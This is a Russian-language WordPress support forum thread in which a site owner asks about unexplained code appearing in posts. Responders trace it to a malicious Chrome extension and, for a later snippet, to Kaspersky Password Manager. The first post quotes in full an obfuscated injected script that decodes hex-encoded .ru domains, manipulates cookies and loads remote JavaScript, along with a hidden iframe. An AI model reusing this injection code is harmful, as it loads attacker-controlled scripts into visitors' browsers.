Поддержка Проблемы и решения Непонятный код в записях

  • С недавнего времени при открытии моих сайтов браузере Хром стало появляться странное сообщение.
    См. скриншот
    Попытки отключить этот плагин в настройках браузера ни к чему не приводят. Казалось бы это можно было бы списать на причуды Хрома и забить на этот вопрос. Но интересно то, в записях моих сайтов, точнее только в тех записях, где вставлен какой-либо объект iframe появляется такой код:

    <script>// < ![CDATA[
    // < ![CDATA[
    // < ![CDATA[
    // < ![CDATA[
    window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21740",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("l-konstantin.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
    // ]]></script><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html" width="300" height="150"></iframe>
    
    <script>// < ![CDATA[
    // < ![CDATA[
    // < ![CDATA[

    После удаления кода он сам по себе появляется вновь после сохранения или публикации записи и виден только при просмотре черновика записи в текстовом режиме. Что это всё значит?

Просмотр 15 ответов — с 16 по 30 (всего 30)
  • Модератор Yui

    (@fierevere)

    永子

    сторонние не могут (пока не могут, хотя тенденции к ухудшению уже есть), разве что это какая-то левая сборка или скачaнная или установленная добрыми дядями из lenovo и подобных контор, хотя до вирусов они еще не докатились, но ставят свои ssl сертификаты, шпионят и собирают данные не хуже традиционных зловредов

    пока не могут, хотя тенденции к ухудшению уже есть

    ну как так? наоборот — со следующего года в FF можно будет только из репозитория расширения ставить, сторонние отрубят — прям как в хроме.

    Модератор Yui

    (@fierevere)

    永子

    при этом перейдя на новый несовместимый с прежними расширениями API/ABI (многопроцессность конечно же хорошо… но) и «похоронив» кучу полезных, но не особо расторопно поддерживаемых их авторами расширений

    кстати могли бы уже и со следующей версии включать обязательную поддержку подписей, все равно старые работать перестанут.

    да, существенный минус проверок подписей — нельзя исправить расширение и пользоваться им, вот взять например Calomel SSL, не в курсах оно про CHACHA20_POLY1305, поэтому брешет как сивая кобыла в оценке таких сайтов, так можно было бы взять и исправить.. ерундовое дело, но ведь оно ж подписано.. Итог — расширение удалять, как ставшее бесполезным.

    и про лицензии я вам опять же не верю — фотошоп стоит 15 тысяч, неужели купили?

    Flector Вы немного не в теме. Потому что не знаете. что есть и другие варианты.
    https://www.adobe.com/ru/creativecloud/photography.html
    Кроме того я по долгу службы я занимаюсь фото и графикой, видео. Это моя работа, которая приносит мне деньги. Поэтому и 15 тыс. для меня не вопрос. )))

    Yui ゆいСпасибо!

    PS: «странное сообщение» из за регистрации расширения в хроме,
    надо чистить «реестр» хрома , в ФФ можно было бы порыться в about:config , в хроме не знаю

    Вы подтвердили то, о чем я интуитивно догадывался. Хотя я и сейчас не могу понять каким именно образом «глюки» браузера связаны с появлением лишнего кода при редактировании записей WP….

    вам уже разжевали, что у вас вирус.
    то ли в браузере, то ли на самом сайте.
    и не помогли вам ваши крутые супер-пупер плагины безопасности.

    Вопрос закрыт. Проблема решена. «Хрени» больше нет. Вирусов и левых расширений в Хроме тоже.

    как решена то?

    как решена то?

    Удалением непонятного расширения из хрома.

    Хотя я и сейчас не могу понять каким именно образом «глюки» браузера связаны с появлением лишнего кода при редактировании записей WP….

    причем тут глюки то?
    если это вредоносное расширение, которое автоматически встраивает свой ифрейм в подходящие страницы?

    Вот это расширение. Сделал скрин перед его удалением из рабочего компа.

    И все же пришлось вернуться к этому вопросу. На моих сайтах. как в старых так и в новых записях не во всех, но во многих, при просмотре HTML кода записи в самом конце можно встретить такие фрагменты кода:

    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin" width="300" height="150"></object></div>
    <div style="width: 0; height: 0; visibility: hidden; opacity: 0; position: absolute;"><object id="kpm_plugin" type="application/x-KPMPlugin"></object></div>

    Что это за application/x-KPMPlugin? Поиск в и-те ничего не дает по этому запросу. Опера и Хром ругаются на этот плагин и пишут что он более не поддерживается. Эти строки удаляю, но они появляются вновь. Что это? Откуда? Раньше такого не было! Никакой закономерности в появлении подобных строк в записях я определить не могу. Где то они есть. Где то нет……

    Модератор Sergey Biryukov

    (@sergeybiryukov)

    Live and Learn

    Похоже на Kaspersky Password Manager.

    Kaspersky Password Manager.

    Пользуюсь я этой программой. И стоит такое расширение в моих браузерах. (Хром, Мозилла. Яндекс браузер). Но какое отношение всё это к WP имеет?!

    Конкретно к WP никакого. Например при просмотре исходного кода любой страницы (даже этой) я вижу следующий код:

    <script type="text/javascript" src="https://gc.kis.scr.kaspersky-labs.com/1B74BD89-2A22-4B93-B451-1C9E1052A0EC/main.js" charset="UTF-8"></script>

    Добавляет его KAV. Т.е. код встраивается именно в момент генерации html кода браузером. На сайте, естественно, этого кода нет. Возможно та же песня и с KPM. Каким то же образом ему нужно «защищать» пароли, вот он и старается…

    хм, а на код lastpass вы тоже ругаетесь? 🙂

Просмотр 15 ответов — с 16 по 30 (всего 30)
  • Тема «Непонятный код в записях» закрыта для новых ответов.